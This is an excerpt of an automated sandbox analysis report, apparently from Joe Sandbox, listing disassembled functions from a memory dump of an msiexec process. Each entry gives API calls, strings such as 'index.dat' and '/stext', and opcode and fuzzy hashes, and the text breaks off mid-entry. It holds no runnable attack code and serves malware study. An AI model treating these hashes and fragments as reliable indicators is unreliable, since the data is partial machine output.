                                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                    • GetLastError.KERNEL32 ref: 00417627
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$File$PointerRead
                                                                    • String ID:
                                                                    • API String ID: 839530781-0
                                                                    • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                    • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                    • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                    • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                    Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FileFindFirst
                                                                    • String ID: *.*$index.dat
                                                                    • API String ID: 1974802433-2863569691
                                                                    • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                    • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                    • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                    • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                    Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                    • GetLastError.KERNEL32 ref: 004175A2
                                                                    • GetLastError.KERNEL32 ref: 004175A8
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$FilePointer
                                                                    • String ID:
                                                                    • API String ID: 1156039329-0
                                                                    • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                    • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                    • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                    • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                    Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                    • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                    • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleTime
                                                                    • String ID:
                                                                    • API String ID: 3397143404-0
                                                                    • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                    • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                    • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                    • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                    Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                    • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Temp$DirectoryFileNamePathWindows
                                                                    • String ID:
                                                                    • API String ID: 1125800050-0
                                                                    • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                    • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                    • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                    • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                    Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                    • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandleSleep
                                                                    • String ID: }A
                                                                    • API String ID: 252777609-2138825249
                                                                    • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                    • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                    • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                    • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                    Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • malloc.MSVCRT ref: 00409A10
                                                                    • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                    • free.MSVCRT ref: 00409A31
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: freemallocmemcpy
                                                                    • String ID:
                                                                    • API String ID: 3056473165-0
                                                                    • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                    • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                    • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                    • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                    Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: d
                                                                    • API String ID: 0-2564639436
                                                                    • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                    • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                    • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                    • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                    Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID: BINARY
                                                                    • API String ID: 2221118986-907554435
                                                                    • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                    • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                    • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                    • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                    Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmp
                                                                    • String ID: /stext
                                                                    • API String ID: 2081463915-3817206916
                                                                    • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                    • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                    • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                    • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                    Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                    • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                      • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                    • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                    • String ID:
                                                                    • API String ID: 2445788494-0
                                                                    • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                    • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                    • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                    • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                    Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                    • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                    • String ID:
                                                                    • API String ID: 3150196962-0
                                                                    • Opcode ID: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                                    • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                    • Opcode Fuzzy Hash: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                                    • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                    Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: malloc
                                                                    • String ID: failed to allocate %u bytes of memory
                                                                    • API String ID: 2803490479-1168259600
                                                                    • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                    • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                    • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                    • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                    Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0041BDDF
                                                                    • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcmpmemset
                                                                    • String ID:
                                                                    • API String ID: 1065087418-0
                                                                    • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                    • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                    • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                    • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                    Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                    • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                      • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                      • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                      • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                    • String ID:
                                                                    • API String ID: 1381354015-0
                                                                    • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                    • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                    • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                    • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                    Function 0040B1AB Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: free
                                                                    • String ID:
                                                                    • API String ID: 1294909896-0
                                                                    • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                    • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                    • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                    • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                    Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                      • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                      • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                      • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                    • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: File$Time$CloseCompareCreateHandlememset
                                                                    • String ID:
                                                                    • API String ID: 2154303073-0
                                                                    • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                    • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                    • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                    • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                    Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                    • String ID:
                                                                    • API String ID: 3150196962-0
                                                                    • Opcode ID: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                                    • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                    • Opcode Fuzzy Hash: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                                    • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                    Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: File$PointerRead
                                                                    • String ID:
                                                                    • API String ID: 3154509469-0
                                                                    • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                    • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                    • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                    • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                    Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                      • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                      • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                      • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfile$StringWrite_itowmemset
                                                                    • String ID:
                                                                    • API String ID: 4232544981-0
                                                                    • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                    • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                    • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                    • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                    Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                    • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                    • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                    • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                    Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                      • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                    • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$FileModuleName
                                                                    • String ID:
                                                                    • API String ID: 3859505661-0
                                                                    • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                    • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
